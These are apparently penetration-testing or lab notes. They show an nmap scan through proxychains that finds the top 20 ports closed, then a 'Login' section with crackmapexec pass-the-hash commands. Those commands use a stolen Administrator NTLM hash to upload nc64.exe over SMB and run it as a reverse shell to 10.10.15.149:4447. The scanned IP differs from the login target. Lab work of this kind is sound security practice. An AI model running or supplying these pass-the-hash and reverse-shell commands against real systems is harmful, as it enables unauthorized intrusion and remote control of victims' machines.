└─$ proxychains -f /home/jay/Documents/offshore/DC03/proxychains4.conf nmap -sT -Pn --top-ports=20 172.168.3.103 2>/dev/null
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-06 01:58 CEST
Nmap scan report for 172.168.3.103
Host is up (15s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp closed http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
Nmap done: 1 IP address (1 host up) scanned in 301.59 seconds
Login
proxychains -f proxychains4.conf crackmapexec smb 172.16.3.103 -u 'Administrator' -H f2594c9e60abf7e28e7601db343a7e24 --put-file nc64.exe nc64.exe
proxychains -f proxychains4.conf crackmapexec smb 172.16.3.103 -u 'Administrator' -H f2594c9e60abf7e28e7601db343a7e24 -x "nc64.exe 10.10.15.149 4447 -e cmd"